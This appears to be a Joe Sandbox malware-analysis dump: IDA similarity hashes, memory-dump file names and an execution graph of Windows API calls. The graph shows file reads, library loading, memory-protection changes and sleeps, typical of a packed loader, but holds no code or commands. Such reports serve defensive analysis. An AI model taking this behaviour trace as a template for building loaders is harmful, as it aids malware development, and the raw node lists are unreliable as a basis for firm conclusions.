                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: z%s%02d$z%s%d
                                                                                                            • API String ID: 233258989-468824935
                                                                                                            • Opcode ID: b5ac45d1495a49dbbcbf8b3c11d35adbd8b347af8a683c7206b01eef3d4240a3
                                                                                                            • Instruction ID: 1fb62246b2d402b40d0b78466855944960ffeba84ad1b7f960a1dd108fa104b8
                                                                                                            • Opcode Fuzzy Hash: b5ac45d1495a49dbbcbf8b3c11d35adbd8b347af8a683c7206b01eef3d4240a3
                                                                                                            • Instruction Fuzzy Hash: 150184A2A18A8B61EB01AF50F5510E5E372AB84BD4FC04132EA4D07655DE3CD645DB20
                                                                                                            Function 00007FF7390C5CA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindHandleModuleResource
                                                                                                            • String ID: RTL
                                                                                                            • API String ID: 3537982541-834975271
                                                                                                            • Opcode ID: 0854f4d08a9f2a9e6124afa04fca78ffc61048a171a0961c66356de938ffab52
                                                                                                            • Instruction ID: 75008fb61160fdf943a43f02194c407bc11c8cc507b846457e085e0f7d707e89
                                                                                                            • Opcode Fuzzy Hash: 0854f4d08a9f2a9e6124afa04fca78ffc61048a171a0961c66356de938ffab52
                                                                                                            • Instruction Fuzzy Hash: A7D01261F09A4F51FF196B61544437552615B19B41FC85438C84E09354EE2CD5849725

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:8.6%
                                                                                                            Dynamic/Decrypted Code Coverage:99.7%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:1235
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 6232 818085 6233 81808a 6232->6233 6238 817e90 6233->6238 6239 81d730 8 API calls 6238->6239 6240 817e9b 6239->6240 6241 816ff0 6 API calls 6240->6241 6242 817ebd 6241->6242 6243 817d40 8 API calls 6242->6243 6244 817ec8 6243->6244 6245 817fa0 6244->6245 6246 81d730 8 API calls 6245->6246 6247 817faf 6246->6247 6248 817fca 6247->6248 6249 818af0 8 API calls 6247->6249 6254 8150a0 6248->6254 6249->6248 6255 81d730 8 API calls 6254->6255 6256 8150ad 6255->6256 6257 81d730 8 API calls 6256->6257 6264 815113 6256->6264 6258 8150c3 6257->6258 6259 81d730 8 API calls 6258->6259 6258->6264 6260 8150dd 6259->6260 6261 81d730 8 API calls 6260->6261 6262 815106 6261->6262 6263 81d730 8 API calls 6262->6263 6262->6264 6263->6264 6265 817110 6264->6265 6267 8170ff 6265->6267 6266 81716e CreateFileW 6268 8171e5 6266->6268 6267->6265 6267->6266 6269 817247 ReadFile 6268->6269 6274 81720f 6268->6274 6270 817307 6269->6270 6271 8173ad LoadLibraryA VirtualProtect 6270->6271 6272 816e7e 6271->6272 6273 8174ef VirtualProtect 6272->6273 6273->6274 6275 81c288 6276 81c2b1 6275->6276 6277 81c2c8 RegCloseKey 6275->6277 6278 814f70 8 API calls 6276->6278 6278->6277 5899 817e90 5906 81d730 5899->5906 5907 81d73d 5906->5907 5910 817e9b 5906->5910 5907->5910 5927 81d610 5907->5927 5909 81d752 TlsGetValue 5909->5910 5911 816ff0 5910->5911 5912 817002 5911->5912 5913 81702b LocalAlloc 5912->5913 5914 817074 5913->5914 5915 81716e CreateFileW 5914->5915 5916 8171e5 5915->5916 5917 817247 ReadFile 5916->5917 5922 81720f 5916->5922 5918 817307 5917->5918 5919 8173ad LoadLibraryA VirtualProtect 5918->5919 5957 816e7e 5919->5957 5923 817d40 5922->5923 5924 817d58 5923->5924 5925 817d5f 5923->5925 5926 818af0 8 API calls 5924->5926 5926->5925 5928 81d61a 5927->5928 5929 81d64b 5928->5929 5931 81d634 5928->5931 5933 818af0 5928->5933 5929->5909 5931->5929 5932 818af0 8 API calls 5931->5932 5932->5929 5936 818ad0 5933->5936 5939 818920 5936->5939 5940 818931 5939->5940 5941 81893b 5939->5941 5949 818840 5940->5949 5942 818950 GetCurrentThreadId 5941->5942 5945 81895d 5941->5945 5942->5945 5944 815150 GetStdHandle WriteFile GetStdHandle WriteFile TlsGetValue 5944->5945 5945->5944 5946 818a84 ExitProcess 5945->5946 5947 818a3b FreeLibrary 5945->5947 5947->5945 5950 8188de 5949->5950 5952 818852 GetStdHandle WriteFile GetStdHandle 5949->5952 5950->5941 5955 819730 5952->5955 5954 8188bc WriteFile 5954->5950 5956 819739 5955->5956 5956->5954 5958 816e88 VirtualProtect 5957->5958 5958->5922 6282 819890 6283 8198a1 6282->6283 6284 8198ab 6282->6284 6285 818d50 SysFreeString 6283->6285 6287 818f60 10 API calls 6284->6287 6286 8198a9 6285->6286 6287->6286 6291 81cb90 6292 81cbc5 6291->6292 6293 81cba9 6291->6293 6293->6292 6294 81b100 46 API calls 6293->6294 6294->6293 6295 831394 6296 8313c0 6295->6296 6297 8313d9 6296->6297 6298 8313cc 6296->6298 6302 817e60 6297->6302 6299 817d40 8 API calls 6298->6299 6301 8313d7 6299->6301 6303 817d40 8 API calls 6302->6303 6304 817e7c 6303->6304 6304->6301 6305 81c698 6306 818cb0 8 API calls 6305->6306 6307 81c6c0 6306->6307 6310 818d90 6307->6310 6311 818db2 6310->6311 6312 818d9f 6310->6312 6312->6311 6313 818cb0 8 API calls 6312->6313 6313->6312 6314 81809b 6317 817ed0 6314->6317 6318 81d730 8 API calls 6317->6318 6319 817ede 6318->6319 6320 817ef9 6319->6320 6321 818af0 8 API calls 6319->6321 6322 8150a0 8 API calls 6320->6322 6321->6320 6323 817f17 6322->6323 6324 81d730 8 API calls 6323->6324 6325 817f1c 6324->6325 6326 817f80 6325->6326 6327 81d730 8 API calls 6325->6327 6328 817f30 6327->6328 6329 817f4c 6328->6329 6330 818af0 8 API calls 6328->6330 6331 8150a0 8 API calls 6329->6331 6330->6329 6332 817f6b 6331->6332 6336 815020 6332->6336 6335 81d730 8 API calls 6335->6326 6337 81d730 8 API calls 6336->6337 6338 81502e 6337->6338 6339 815053 6338->6339 6345 8151a0 6338->6345 6341 81d730 8 API calls 6339->6341 6342 815058 6341->6342 6343 81d730 8 API calls 6342->6343 6344 815068 6343->6344 6344->6335 6346 818ad0 8 API calls 6345->6346 6347 8151b0 6346->6347 6347->6339 6348 81cca1 6349 817fa0 13 API calls 6348->6349 6350 81cc92 6349->6350 6422 8152b0 6423 81d730 8 API calls 6422->6423 6424 8152ba 6423->6424 6425 81d730 8 API calls 6424->6425 6426 8152c5 6425->6426 6357 8139b0 6358 813a80 6357->6358 6359 8139cf 6357->6359 6362 813d05 6358->6362 6363 813a89 6358->6363 6360 813a27 6359->6360 6361 8139de 6359->6361 6365 8133c0 3 API calls 6360->6365 6379 8139ea 6361->6379 6385 8133c0 6361->6385 6362->6379 6407 813240 6362->6407 6364 813aa2 6363->6364 6371 813bb1 6363->6371 6370 813ac7 6364->6370 6372 813b7c 6364->6372 6364->6379 6376 813a44 6365->6376 6367 813be9 6369 8133c0 3 API calls 6367->6369 6367->6379 6380 813cd3 6369->6380 6370->6379 6403 812e40 6370->6403 6371->6367 6374 812e40 Sleep 6371->6374 6371->6379 6375 8133c0 3 API calls 6372->6375 6374->6367 6382 813b87 6375->6382 6378 813790 3 API calls 6376->6378 6376->6379 6377 8139fd 6377->6379 6396 813790 6377->6396 6378->6379 6380->6379 6383 813790 3 API calls 6380->6383 6382->6379 6384 813790 3 API calls 6382->6384 6383->6379 6384->6379 6386 8133f4 6385->6386 6387 813629 6385->6387 6388 813403 6386->6388 6392 8134b7 Sleep 6386->6392 6389 81364a 6387->6389 6394 81341a 6387->6394 6391 8134e0 6388->6391 6388->6394 6390 812e40 Sleep 6389->6390 6390->6394 6393 812e40 Sleep 6391->6393 6392->6388 6395 8134d0 Sleep 6392->6395 6393->6394 6394->6377 6395->6386 6397 8137b4 6396->6397 6398 8137ad 6396->6398 6400 812e40 Sleep 6397->6400 6402 8137be 6397->6402 6398->6397 6399 813842 Sleep 6398->6399 6399->6397 6401 813865 Sleep 6399->6401 6400->6402 6401->6398 6402->6379 6404 812e95 6403->6404 6405 812e4d 6403->6405 6404->6379 6405->6404 6406 812e75 Sleep 6405->6406 6406->6405 6408 81336b 6407->6408 6409 81326d VirtualQuery 6407->6409 6413 8133c0 3 API calls 6408->6413 6417 813319 6408->6417 6411 813332 6409->6411 6412 8132a9 6409->6412 6414 8133c0 3 API calls 6411->6414 6412->6411 6415 8132dd VirtualAlloc 6412->6415 6418 813385 6413->6418 6419 81333a 6414->6419 6415->6411 6416 8132fb VirtualAlloc 6415->6416 6416->6411 6416->6417 6417->6379 6418->6417 6420 813790 3 API calls 6418->6420 6419->6417 6421 813790 3 API calls 6419->6421 6420->6417 6421->6417 6431 818fb0 6432 818bd0 14 API calls 6431->6432 6433 818fcc 6432->6433 6434 818d00 8 API calls 6433->6434 6435 818fea 6434->6435 6436 81adb2 6437 81aded 6436->6437 6441 81adc6 6436->6441 6438 81b010 8 API calls 6437->6438 6440 81adfb 6438->6440 6442 817e90 14 API calls 6440->6442 6441->6437 6446 81b010 6441->6446 6443 81ae00 6442->6443 6444 817fa0 13 API calls 6443->6444 6445 81ae05 6444->6445 6447 81b07d 6446->6447 6449 81b024 6446->6449 6447->6441 6448 81b071 6450 814f70 8 API calls 6448->6450 6449->6447 6449->6448 6452 81a4d0 6449->6452 6450->6447 6453 81a4f0 6452->6453 6460 81a561 6452->6460 6454 81a4fa 6453->6454 6455 81a52e 6453->6455 6456 81a504 6454->6456 6457 81a5ce 6454->6457 6455->6460 6461 81a60d 6455->6461 6462 81a548 6455->6462 6458 81a557 6456->6458 6459 81a50d 6456->6459 6457->6460 6483 81a430 6457->6483 6475 818dc0 6458->6475 6459->6460 6468 81a584 6459->6468 6469 81a51f 6459->6469 6460->6448 6461->6460 6470 81b010 8 API calls 6461->6470 6463 81a555 6462->6463 6464 81a627 6462->6464 6471 818d90 8 API calls 6463->6471 6466 815220 8 API calls 6464->6466 6466->6460 6468->6460 6479 81a4a0 6468->6479 6469->6464 6473 81a52c 6469->6473 6470->6461 6471->6460 6473->6460 6474 81a4d0 8 API calls 6473->6474 6474->6473 6476 818de2 6475->6476 6477 818dcf 6475->6477 6476->6460 6477->6476 6478 818d00 8 API calls 6477->6478 6478->6477 6480 81a4b6 6479->6480 6481 81a4ae 6479->6481 6482 815220 8 API calls 6480->6482 6481->6468 6482->6481 6484 81a44b 6483->6484 6485 81a48d 6483->6485 6484->6485 6486 81a4d0 8 API calls 6484->6486 6485->6457 6486->6484 6487 81dbb5 6488 81dbe3 6487->6488 6489 81dce5 RaiseException 6488->6489 6490 81dd13 6488->6490 6498 81de05 6489->6498 6491 81de51 6490->6491 6492 81de42 LoadLibraryA 6490->6492 6490->6498 6493 81de59 GetLastError 6491->6493 6494 81debd 6491->6494 6492->6491 6496 81de6f 6493->6496 6494->6498 6499 81e680 LocalAlloc 6494->6499 6495 81de8c RaiseException 6495->6498 6496->6494 6496->6495 6499->6498 6503 81eac1 6504 81eb09 6503->6504 6507 81eaf6 6503->6507 6509 819660 6504->6509 6506 818d00 8 API calls 6508 81eb3c 6506->6508 6507->6506 6512 81966f 6509->6512 6510 8191c0 14 API calls 6511 8196a2 6510->6511 6511->6507 6512->6510 6513 8141c0 6516 814120 6513->6516 6517 814175 6516->6517 6520 81412d 6516->6520 6518 814180 VirtualAlloc 6517->6518 6519 8141a3 6517->6519 6518->6519 6520->6517 6521 814138 Sleep 6520->6521 6522 814155 Sleep 6520->6522 6521->6520 6522->6520 5959 84ecc0 5960 84ece0 5959->5960 5961 84ed2e 5960->5961 5965 81db10 5960->5965 5964 818920 8 API calls 5964->5961 5966 81db2b 5965->5966 5969 818160 5966->5969 5970 818186 5969->5970 5971 81818d GetCurrentThreadId 5969->5971 5970->5971 5972 8181dc 5971->5972 5973 8182a0 5972->5973 5974 818299 5972->5974 5975 818920 8 API calls 5973->5975 5978 8180b0 5974->5978 5977 81829e 5975->5977 5977->5964 5979 81812d 5978->5979 5980 8180c6 5978->5980 5979->5977 5980->5979 5983 81d440 5980->5983 5992 826a10 5980->5992 5984 81d511 5983->5984 5985 81d458 5983->5985 5984->5980 5986 81d463 SetThreadLocale 5985->5986 5996 81b390 InitializeCriticalSection GetVersion 5986->5996 5988 81d46d 5989 81d49c 5988->5989 5990 81d4f1 GetCurrentThreadId 5989->5990 5999 81d320 GetVersion 5990->5999 5993 826a24 5992->5993 5994 826a30 5992->5994 6001 8183e0 5993->6001 5994->5980 5997 81b3c9 6 API calls 5996->5997 5998 81b42f 5996->5998 5997->5998 5998->5988 6000 81d33f 5999->6000 6000->5984 6002 8184aa 6001->6002 6014 81841c 6001->6014 6055 818cb0 6002->6055 6014->6002 6016 8183c0 6014->6016 6019 8182c0 6014->6019 6026 819380 6014->6026 6032 818340 6014->6032 6039 819330 6014->6039 6049 819270 6014->6049 6066 81d210 6016->6066 6020 81d210 46 API calls 6019->6020 6021 8182e6 6020->6021 6119 819830 6021->6119 6024 818cb0 8 API calls 6025 818300 6024->6025 6025->6014 6027 81939b 6026->6027 6028 8193b2 6026->6028 6027->6028 6031 818bd0 14 API calls 6027->6031 6029 818d00 8 API calls 6028->6029 6030 8193ef 6029->6030 6030->6014 6031->6028 6033 81d210 46 API calls 6032->6033 6034 818366 6033->6034 6159 819d70 6034->6159 6037 818cb0 8 API calls 6038 81837d 6037->6038 6038->6014 6040 81933c 6039->6040 6045 819346 6039->6045 6041 819341 6040->6041 6042 819348 6040->6042 6043 818d50 SysFreeString 6041->6043 6044 81935b 6042->6044 6047 819362 6042->6047 6043->6045 6046 818d50 SysFreeString 6044->6046 6045->6014 6046->6045 6047->6045 6048 818c50 8 API calls 6047->6048 6048->6045 6050 81929d 6049->6050 6051 81928b 6049->6051 6052 818cb0 8 API calls 6050->6052 6051->6050 6053 818b70 11 API calls 6051->6053 6054 8192d8 6052->6054 6053->6050 6054->6014 6056 8184b5 6055->6056 6057 818cbe 6055->6057 6059 818d50 6056->6059 6057->6056 6182 814f70 6057->6182 6060 818d62 SysFreeString 6059->6060 6061 8184be 6059->6061 6060->6061 6062 818d00 6061->6062 6063 8184c7 6062->6063 6064 818d0e 6062->6064 6063->5994 6064->6063 6065 814f70 8 API calls 6064->6065 6065->6063 6067 81d23d 6066->6067 6074 8183d0 6066->6074 6068 81d247 6067->6068 6069 81d279 6067->6069 6075 81b160 6068->6075 6085 819c90 6069->6085 6072 81d252 6079 818f00 6072->6079 6074->6014 6076 81b170 6075->6076 6077 81b18a 6075->6077 6076->6077 6089 81b100 6076->6089 6077->6072 6080 818f1f 6079->6080 6084 818f26 6079->6084 6104 818b70 6080->6104 6082 818cb0 8 API calls 6083 818f54 6082->6083 6083->6074 6084->6082 6086 819ca4 6085->6086 6087 818f00 11 API calls 6086->6087 6088 819cb2 6087->6088 6088->6074 6090 81b116 6089->6090 6092 81b135 6089->6092 6093 81ca80 GetModuleFileNameW 6090->6093 6092->6077 6094 819cc0 11 API calls 6093->6094 6095 81cad5 6094->6095 6096 819c90 11 API calls 6095->6096 6097 81cae2 6096->6097 6098 81c830 45 API calls 6097->6098 6099 81caf3 6098->6099 6100 818d90 8 API calls 6099->6100 6101 81cb28 6100->6101 6102 818cb0 8 API calls 6101->6102 6103 81cb31 6102->6103 6103->6092 6105 818b9d 6104->6105 6106 818b7e 6104->6106 6105->6084 6107 818b8b 6106->6107 6116 815bd0 6106->6116 6110 814f40 6107->6110 6111 814f4a 6110->6111 6112 814f4f 6110->6112 6111->6105 6115 8133c0 Sleep Sleep Sleep 6112->6115 6113 814f55 6113->6111 6114 815220 8 API calls 6113->6114 6114->6111 6115->6113 6117 8151c0 8 API calls 6116->6117 6118 815bee 6117->6118 6118->6107 6120 819840 6119->6120 6121 819839 6119->6121 6125 8191c0 6120->6125 6122 818d00 8 API calls 6121->6122 6124 8182f6 6122->6124 6124->6024 6126 8191db 6125->6126 6128 8191e7 6125->6128 6127 818d00 8 API calls 6126->6127 6131 8191e5 6127->6131 6133 819760 6128->6133 6130 81921f 6130->6131 6132 818d00 8 API calls 6130->6132 6131->6124 6132->6131 6134 819776 6133->6134 6137 819783 6133->6137 6135 818d00 8 API calls 6134->6135 6141 81977e 6135->6141 6136 8197d1 6153 818bd0 6136->6153 6137->6136 6139 819792 6137->6139 6144 814fa0 6139->6144 6141->6130 6142 8197db 6142->6141 6143 818d00 8 API calls 6142->6143 6143->6141 6145 814faf 6144->6145 6146 814fea 6144->6146 6147 814fb4 6145->6147 6148 814fce 6145->6148 6149 814fcc 6146->6149 6150 815220 8 API calls 6146->6150 6147->6149 6151 815220 8 API calls 6147->6151 6148->6149 6152 815220 8 API calls 6148->6152 6149->6141 6150->6149 6151->6149 6152->6149 6154 818be1 6153->6154 6155 818c05 6153->6155 6156 818bee 6154->6156 6158 815bd0 8 API calls 6154->6158 6155->6142 6157 816fce 6 API calls 6156->6157 6157->6155 6158->6156 6160 819d80 6159->6160 6161 819d79 6159->6161 6165 818f60 6160->6165 6162 818d50 SysFreeString 6161->6162 6164 818373 6162->6164 6164->6037 6166 818f6e 6165->6166 6169 818f78 6165->6169 6167 818d50 SysFreeString 6166->6167 6172 818f76 6167->6172 6168 818f90 6171 818f96 SysFreeString 6168->6171 6168->6172 6169->6168 6173 818c50 6169->6173 6171->6172 6172->6164 6176 8151c0 6173->6176 6177 8151d8 6176->6177 6178 8151ec 6177->6178 6179 81d730 8 API calls 6177->6179 6180 8151a0 8 API calls 6178->6180 6179->6178 6181 815217 6180->6181 6181->6168 6183 814f7a 6182->6183 6184 814f7f 6182->6184 6183->6056 6184->6183 6186 815220 6184->6186 6187 8151c0 8 API calls 6186->6187 6188 81523c 6187->6188 6188->6183 6523 8126c9 6526 81a7f5 6523->6526 6525 8126d1 6567 81a690 6526->6567 6528 81a840 6528->6525 6529 819380 14 API calls 6535 81a6d5 6529->6535 6531 819330 9 API calls 6531->6535 6532 815220 8 API calls 6532->6535 6533 819270 11 API calls 6533->6535 6535->6526 6535->6528 6535->6529 6535->6531 6535->6532 6535->6533 6537 81a660 6535->6537 6541 81a880 6535->6541 6578 81b090 6535->6578 6538 81a676 6537->6538 6540 81a66e 6537->6540 6539 815220 8 API calls 6538->6539 6539->6540 6540->6535 6542 81a8a0 6541->6542 6551 81a92e 6541->6551 6543 81a8e9 6542->6543 6544 81a8aa 6542->6544 6549 81a903 6543->6549 6550 81aa20 6543->6550 6543->6551 6545 81a9d0 6544->6545 6546 81a8b4 6544->6546 6545->6551 6560 81a690 18 API calls 6545->6560 6547 81a912 6546->6547 6548 81a8bd 6546->6548 6547->6551 6561 819380 14 API calls 6547->6561 6552 81a933 6548->6552 6553 81a8ca 6548->6553 6554 81aa41 6549->6554 6555 81a910 6549->6555 6550->6551 6556 81b090 18 API calls 6550->6556 6551->6535 6552->6551 6562 819330 9 API calls 6552->6562 6557 81a8d7 6553->6557 6558 81a975 6553->6558 6559 815220 8 API calls 6554->6559 6555->6551 6563 819270 11 API calls 6555->6563 6556->6550 6557->6554 6565 81a8e4 6557->6565 6558->6551 6564 81a660 8 API calls 6558->6564 6559->6551 6560->6545 6561->6547 6562->6552 6563->6555 6564->6558 6565->6551 6566 81a880 18 API calls 6565->6566 6566->6565 6568 81a840 6567->6568 6576 81a6bb 6567->6576 6568->6535 6569 81a690 18 API calls 6569->6576 6570 819380 14 API calls 6570->6576 6571 81b090 18 API calls 6571->6576 6572 819330 9 API calls 6572->6576 6573 815220 8 API calls 6573->6576 6574 819270 11 API calls 6574->6576 6575 81a660 8 API calls 6575->6576 6576->6568 6576->6569 6576->6570 6576->6571 6576->6572 6576->6573 6576->6574 6576->6575 6577 81a880 18 API calls 6576->6577 6577->6576 6579 81b0a5 6578->6579 6582 81b0bb 6578->6582 6580 81b0ab 6579->6580 6579->6582 6585 81ae70 6580->6585 6584 81b010 8 API calls 6582->6584 6583 81b0b9 6583->6535 6584->6583 6586 81ae92 6585->6586 6587 81ae79 6585->6587 6589 81b010 8 API calls 6586->6589 6591 81aea0 6587->6591 6590 81ae90 6589->6590 6590->6583 6594 81aec7 6591->6594 6598 81afd0 6591->6598 6592 81b010 8 API calls 6593 81affb 6592->6593 6593->6590 6595 814f40 11 API calls 6594->6595 6594->6598 6596 81af6b 6595->6596 6597 81a880 18 API calls 6596->6597 6596->6598 6597->6598 6598->6592 6608 8314cc 6617 8305e0 6608->6617 6610 831506 6611 817d40 8 API calls 6610->6611 6612 831512 6611->6612 6613 818d90 8 API calls 6612->6613 6614 831522 6613->6614 6615 818cb0 8 API calls 6614->6615 6616 83152e 6615->6616 6619 83060a 6617->6619 6625 82ba90 6619->6625 6621 819270 11 API calls 6622 830644 6621->6622 6623 818cb0 8 API calls 6622->6623 6624 83064e 6623->6624 6624->6610 6628 82bac0 6625->6628 6631 82baf0 6628->6631 6632 82bb35 6631->6632 6635 82bb82 6632->6635 6644 82b9c0 6632->6644 6634 82bc19 6636 818f00 11 API calls 6634->6636 6635->6634 6642 82bba2 6635->6642 6637 82baac 6636->6637 6637->6621 6638 82bc0c 6640 819dc0 11 API calls 6638->6640 6639 818cb0 8 API calls 6639->6642 6640->6637 6642->6638 6642->6639 6643 82b9c0 53 API calls 6642->6643 6647 819dc0 6642->6647 6643->6642 6660 82c0e0 6644->6660 6648 819de3 6647->6648 6649 819dd6 6647->6649 6651 819e45 6648->6651 6653 819df2 6648->6653 6650 818cb0 8 API calls 6649->6650 6657 819dde 6650->6657 6652 818b70 11 API calls 6651->6652 6658 819e4c 6652->6658 6654 819e0a 6653->6654 6655 815bd0 8 API calls 6653->6655 6656 814fa0 8 API calls 6654->6656 6655->6654 6656->6657 6657->6642 6658->6657 6659 818cb0 8 API calls 6658->6659 6659->6657 6661 82c157 6660->6661 6680 82c14e 6660->6680 6662 818d90 8 API calls 6661->6662 6663 82cfe7 6662->6663 6664 818cb0 8 API calls 6663->6664 6665 82b9e5 6664->6665 6665->6635 6666 819cc0 11 API calls 6666->6680 6667 82b940 53 API calls 6667->6680 6668 819c40 11 API calls 6668->6680 6677 82b3b0 18 API calls 6677->6680 6679 82dce0 18 API calls 6679->6680 6680->6661 6680->6666 6680->6667 6680->6668 6680->6677 6680->6679 6681 82b110 6680->6681 6687 82b180 6680->6687 6690 82b390 6680->6690 6693 819c60 6680->6693 6697 819da0 6680->6697 6700 819d10 6680->6700 6706 82c080 6680->6706 6711 82b140 6680->6711 6717 82b1a0 6680->6717 6682 82b12b 6681->6682 6683 82b11c 6681->6683 6684 82acc0 11 API calls 6682->6684 6720 82acc0 6683->6720 6686 82b129 6684->6686 6686->6680 6688 82acc0 11 API calls 6687->6688 6689 82b193 6688->6689 6689->6680 6724 82b1c0 6690->6724 6694 819c74 6693->6694 6764 8190d0 6694->6764 6698 819000 11 API calls 6697->6698 6699 819dbb 6698->6699 6699->6680 6701 819d20 6700->6701 6702 819d19 6700->6702 6704 819000 11 API calls 6701->6704 6703 818cb0 8 API calls 6702->6703 6705 819d1e 6703->6705 6704->6705 6705->6680 6707 818cb0 8 API calls 6706->6707 6708 82c0a3 6707->6708 6709 82c0b7 6708->6709 6710 815220 8 API calls 6708->6710 6709->6680 6710->6709 6712 82b15d 6711->6712 6713 82b14d 6711->6713 6715 82adf0 11 API calls 6712->6715 6778 82adf0 6713->6778 6716 82b15b 6715->6716 6716->6680 6718 82adf0 11 API calls 6717->6718 6719 82b1b3 6718->6719 6719->6680 6721 82acd9 6720->6721 6722 819dc0 11 API calls 6721->6722 6723 82ad5d 6722->6723 6723->6686 6725 82b1ee 6724->6725 6726 82b251 6725->6726 6727 82b204 6725->6727 6728 81ae30 18 API calls 6726->6728 6735 81ae30 6727->6735 6730 82b222 6728->6730 6738 833d20 6730->6738 6732 82b337 6733 81b010 8 API calls 6732->6733 6734 82b348 6733->6734 6734->6680 6741 81aad0 6735->6741 6739 819dc0 11 API calls 6738->6739 6740 833d3d 6739->6740 6740->6732 6742 81ab1f 6741->6742 6746 81ab45 6741->6746 6743 81ab2d 6742->6743 6744 815220 8 API calls 6742->6744 6745 81b010 8 API calls 6743->6745 6744->6743 6757 81ab40 6745->6757 6747 81abd5 6746->6747 6748 815220 8 API calls 6746->6748 6749 81abe8 6747->6749 6750 815220 8 API calls 6747->6750 6748->6747 6751 81abf9 6749->6751 6752 81ac56 6749->6752 6750->6749 6753 81ac3c 6751->6753 6756 81aa80 8 API calls 6751->6756 6755 814f40 11 API calls 6752->6755 6754 814fa0 8 API calls 6753->6754 6759 81ac49 6754->6759 6758 81ac5f 6755->6758 6756->6753 6757->6730 6760 81a880 18 API calls 6758->6760 6763 81acbc 6758->6763 6759->6757 6762 81aad0 18 API calls 6759->6762 6760->6763 6761 81b010 8 API calls 6761->6759 6762->6759 6763->6761 6767 819000 6764->6767 6768 81902e 6767->6768 6773 81903c 6767->6773 6769 818cb0 8 API calls 6768->6769 6772 819037 6769->6772 6770 81907c 6771 819dc0 11 API calls 6770->6771 6776 81908f 6771->6776 6772->6680 6773->6770 6774 81906a 6773->6774 6775 818f00 11 API calls 6774->6775 6775->6772 6777 819dc0 11 API calls 6776->6777 6777->6772 6779 82ae04 6778->6779 6780 82ae2f 6779->6780 6782 82ae3f 6779->6782 6781 82acc0 11 API calls 6780->6781 6784 82ae3a 6781->6784 6783 819dc0 11 API calls 6782->6783 6783->6784 6784->6716 6785 8184d0 6786 818cb0 8 API calls 6785->6786 6787 8184f0 6786->6787 6788 818d50 SysFreeString 6787->6788 6789 818504 6788->6789 6790 818d00 8 API calls 6789->6790 6791 818518 6790->6791 6792 8198d0 6793 8198e0 6792->6793 6794 8198d9 6792->6794 6798 8190f0 6793->6798 6795 818d50 SysFreeString 6794->6795 6797 8198de 6795->6797 6799 81911e 6798->6799 6804 81912c 6798->6804 6800 818d50 SysFreeString 6799->6800 6803 819127 6800->6803 6801 81916c 6809 819b30 6801->6809 6803->6797 6804->6801 6805 81915a 6804->6805 6806 818f60 10 API calls 6805->6806 6806->6803 6807 81917f 6808 819b30 9 API calls 6807->6808 6808->6803 6810 819b43 6809->6810 6814 819b4a 6809->6814 6815 818c80 6810->6815 6819 819860 6814->6819 6816 818ca6 6815->6816 6817 818c8c 6815->6817 6816->6814 6817->6816 6818 818c50 8 API calls 6817->6818 6818->6816 6820 819883 6819->6820 6821 81987a 6819->6821 6820->6807 6822 818d50 SysFreeString 6821->6822 6822->6820 6823 8162d0 6824 8162e5 6823->6824 6825 816356 6824->6825 6826 8162ea 6824->6826 6828 818cb0 8 API calls 6825->6828 6827 8162fa 6826->6827 6830 816307 6826->6830 6833 81d1f0 6827->6833 6832 816305 6828->6832 6831 81d1f0 11 API calls 6830->6831 6831->6832 6836 81d110 6833->6836 6837 818cb0 8 API calls 6836->6837 6838 81d133 6837->6838 6839 819dc0 11 API calls 6838->6839 6849 81d19c 6838->6849 6842 81d14f 6839->6842 6840 818cb0 8 API calls 6841 81d1a6 6840->6841 6841->6832 6843 81d186 6842->6843 6844 81d176 6842->6844 6846 818cb0 8 API calls 6843->6846 6845 819dc0 11 API calls 6844->6845 6847 81d184 6845->6847 6846->6847 6848 819270 11 API calls 6847->6848 6848->6849 6849->6840 6189 8179d8 6190 81768d 6189->6190 6192 8179ee 6189->6192 6191 817a06 6191->6190 6193 817b03 6191->6193 6192->6191 6200 817150 6192->6200 6195 817b10 6193->6195 6196 817b1e 6193->6196 6210 8170b0 6195->6210 6220 817090 6196->6220 6199 817b1c 6199->6190 6230 81765e 6200->6230 6202 81716e CreateFileW 6203 8171e5 6202->6203 6204 81720f 6203->6204 6205 817247 ReadFile 6203->6205 6204->6191 6206 817307 6205->6206 6207 8173ad LoadLibraryA VirtualProtect 6206->6207 6208 816e7e 6207->6208 6209 8174ef VirtualProtect 6208->6209 6209->6204 6211 8170b6 6210->6211 6212 81716e CreateFileW 6211->6212 6213 8171e5 6212->6213 6214 817247 ReadFile 6213->6214 6219 81720f 6213->6219 6215 817307 6214->6215 6216 8173ad LoadLibraryA VirtualProtect 6215->6216 6217 816e7e 6216->6217 6218 8174ef VirtualProtect 6217->6218 6218->6219 6219->6199 6221 8170b6 6220->6221 6222 81716e CreateFileW 6221->6222 6223 8171e5 6222->6223 6224 817247 ReadFile 6223->6224 6229 81720f 6223->6229 6225 817307 6224->6225 6226 8173ad LoadLibraryA VirtualProtect 6225->6226 6227 816e7e 6226->6227 6228 8174ef VirtualProtect 6227->6228 6228->6229 6229->6199 6231 817700 6230->6231 6231->6202 6861 81e4e0 6863 81e4f3 6861->6863 6862 81e604 6863->6862 6865 81dbb0 6863->6865 6866 81dbb5 6865->6866 6867 81dce5 